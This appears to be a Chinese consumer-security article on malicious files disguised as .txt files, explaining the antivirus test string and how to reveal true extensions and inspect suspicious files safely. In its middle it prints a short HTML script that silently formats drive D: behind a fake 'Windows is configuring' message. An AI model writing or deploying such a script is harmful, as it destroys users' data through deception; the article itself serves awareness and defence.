众所周知，TXT文件的内容无非是一些文字内容，怎么会成为系统杀手呢？其实，这些堪称杀手的TXT文件，并非真正的扩展名为TXT的文件，而是隐藏了真实扩展名的文件，而且可以用“记事本”程序打开，这也可以说是一个漏洞，正因于此，TXT文件才会成为一个凶悍无比的系统杀手。

    TXT文件怎么变杀手的？
    其实，只要在隐蔽了真实扩展名的TXT文件中，植入一段恶意的代码，TXT文件就成为了地地道道的病毒。据悉，欧洲防病毒协会曾经公开过一段病毒测试代码，以检查现有杀毒软件的防病毒能力。利用病毒测试代码测试的原理也非常简单，用户只需要在磁盘中建立一个扩展名为TXT的文件，然后将欧洲防病毒协会公开的病毒测试代码复制过去，保存TXT文件看杀毒软件是否可以查杀该文本文件。

    将病毒测试代码写入TXT文件，果真会被杀毒软件封杀吗？下面，我们不妨实际测试一下。笔者机器中安装了诺顿企业版的杀毒软件，病毒库已经更新到2007年9月9日。在磁盘中建立一个名字为IT168safe.txt的文件，将病毒测试代码复制到该文本文件中保存。这时，IT168safe.txt文件被诺顿企业版杀毒软件被病毒删除了。显然，TXT文件只要被植入恶意代码，也会变成凶悍无比的病毒。正因于此，TXT文件才会变成系统杀手。图一

保存病毒测试代码图

    除此之外，一些伪装成为TXT文件的html文件，以及一些脚本文件，也具备非常强大的破坏力。以下是一段可以执行脚本文件的内容：
    <script>
    a=new ActiveXObject("WSCript.Shell");
    a.run("format.com d:/q /autotest /u");
    alert("Windows is configuring the system. Please do not interrupt this process.");
    </script>
     既便是对脚本技术不熟悉的人也能看出来，上述代码一旦被执行，D盘将会被格式化。先将该段脚本内容保存为一个TXT文件，然后再伪装成为一个可以用浏览器打开的html文件，这个TXT的杀伤力可想而知了。
   
    只要有合适的环境，TXT也会成为一个凶悍无比的杀手。更重要的是，由于众多用户认为TXT文件不会携带病毒，更不具备什么破坏力，TXT文件对系统的破坏更隐蔽。

    巧妙识别具有破坏力TXT文件
    只要内置这些恶意代码的TXT文件被执行，硬盘可能会被格式化，硬盘中的重要文件也可能会被删除。从技术角度讲，只要有破坏能力的TXT文件不被执行，系统安全就得到了保障。只有准确识别具有破坏力的TXT文件，这样才能有效阻止TXT文件对操作系统的破坏。识别文件真正扩展名的方法，主要有以下几种：

    1、先看文件的图标：通常情况下，TXT文件可以用“记事本”程序打开，而TXT的文件也通常是文本文件的图标。如果是隐藏了真实扩展名的TXT文件，其图标并不是文本文件的图标，而是显示未定义文件类型的标志。只要看到文件的图标不是文本文件图标，就不要轻易打开。

    2、在DOS提示符下查看：在“我的电脑”或“资源管理器”中查看文件，一些已知文件的扩展名是不会被显示出来的，因此，一些隐蔽了真实扩展名的TXT文件，也可以打开，而且对操作系统有一定的破坏。要想查看文件的真实扩展名，可以在DOS提示符下查看。在“开始”菜单的“运行”中输入“cmd”就可以进入DOS提示符，输入“dir”命令之后，可以看到所有文件名的扩展名。图二

文件完整的扩展名

    3、显示所有文件的扩展名：如果用户对DOS命令并不熟悉，如何才能查看文件的完整扩展名呢？在资源管理器的界面中，选择“工具”菜单中的“文件夹选项”，在“查看”功能选项中，禁用“隐藏已知文件类型的扩展名”这一项。这时，我们在资源管理器中也可以看到文件的真实扩展名。

    4、邮件附件另存后再查看：一些恶意的破坏者，通常会将一些恶意程序隐蔽成为TXT文件。而在Foxmail或者Outlook客户端中，用户是无法看到附件完整的扩展名的。既便是在Web页面的邮箱界面中，也无法看到附件完整的扩展名。这种情况下，用户最好先将邮件中的附件，另存到本地硬盘，然后按上述三个方法查看邮件附件的真实扩展名。

    操作系统的一些默认设置，会给用户一种错觉，无法看到文件真实扩展名的错觉。为此，用户必须仔细辩认，用多种方法，查看文件真实的扩展名，杜绝伪装成TXT文件的系统杀手。

    防范伪装TXT文件的系统杀手
    这些伪装成TXT文件的系统杀手，只要不运行是没有任何破坏力的。有了这个原则，对付防范伪装的TXT文件就不再是难事，方法如下：

    1、直接删除：如果发现有些文件的真正扩展名并不是TXT，可以将这些文件直接删除，这样就不用担心这些伪装的TXT对系统有任何破坏了。不过，直接删除的方法，仅仅适合于个人用户，这也是一个实用效果最差的防范措施。尽管这些文件的扩展名不是TXT，可是没有查看内容就直接删除，万一文件中有重要内容，直接删除的方法就显得不妥当了。因此，直接删除的方法有一定的弊端。

    2、选择合适的打开方式：出于稳妥，在删除伪装成TXT的可疑文件之前，建议查看一下文件中的内容，防止误删除带来不必要的麻烦。在资源管理器中，对于一些可疑文件，点击右键，在“打开方式”中选择记事本程序，这样可以查看到文件中的内容。如果文件中确实是一些重要内容，建议将文件另存为一个扩展名为TXT的文件。如果文件内容是无法识别的乱码，可以将这些可疑文件删除。图三

选择文件打开方式

    3、用DOS命令查看内容：熟悉DOS命令的用户都知道，使用type命令，可以显示文本文件的内容。在DOS提示符下，输入type命令，后面加上要显示内容的文件名和扩展名，便可以看到文件的真实内容。如果不是文本文件，会显示出乱码。用type命令，即可以查看到文件的内容，又可以避免运行这些可疑的TXT文件。

    尽管这些系统杀手会伪装成TXT文件，可是，只要在使用中小心防范，系统杀手又怎么会有可乘之机呢？对于可疑的TXT文件，是删除，还是查看内容后再删除，用户要谨慎对待。无论怎么样，防范TXT可疑文件的原则就是不运行此类文件。

    结束语：一直以来，很多普通用户都认为可执行文件才是病毒的非常好的载体，殊不知，TXT文件也有可能成为病毒的一个新载体。由于用户对TXT文件的疏忽，TXT文件很容易变成系统杀手。为此，用户必须提高警惕，莫让TXT文件成为系统杀手！